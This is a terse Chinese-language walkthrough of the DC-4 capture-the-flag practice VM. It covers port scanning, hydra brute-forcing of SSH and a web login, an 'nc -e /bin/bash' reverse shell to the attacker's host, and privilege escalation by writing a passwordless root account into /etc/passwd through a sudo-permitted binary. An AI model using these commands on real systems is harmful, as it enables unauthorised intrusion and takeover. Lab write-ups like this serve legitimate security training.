仅供个人娱乐
靶机信息
下载地址:http://www.five86.com/downloads/DC-4.zip
一、主机扫描
arp-scan -l
nmap -p 1-65535 -A -sV 192.168.17.130
二、信息收集
dirb http://192.168.17.130
三、漏洞查找和利用
爆破ssh
hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130
字典设置太大了。
web页面
爆破
或者使用hydra 爆破密码
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^ password=^PASS^:S=logout" -F
登录成功
信息收集
抓包
可以反弹shell命令:
nc -e /bin/bash 192.168.17.129 4444
python -c 'import pty;pty.spawn("/bin/bash")'
信息收集
复制 作为字典
ssh登录
查看信息
切换账户登录[charles:^xHhA&hvim0y]
查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee
信息收集
第一种获取权限方法
添加账户
echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd
tail -n 5 /etc/passwd
su test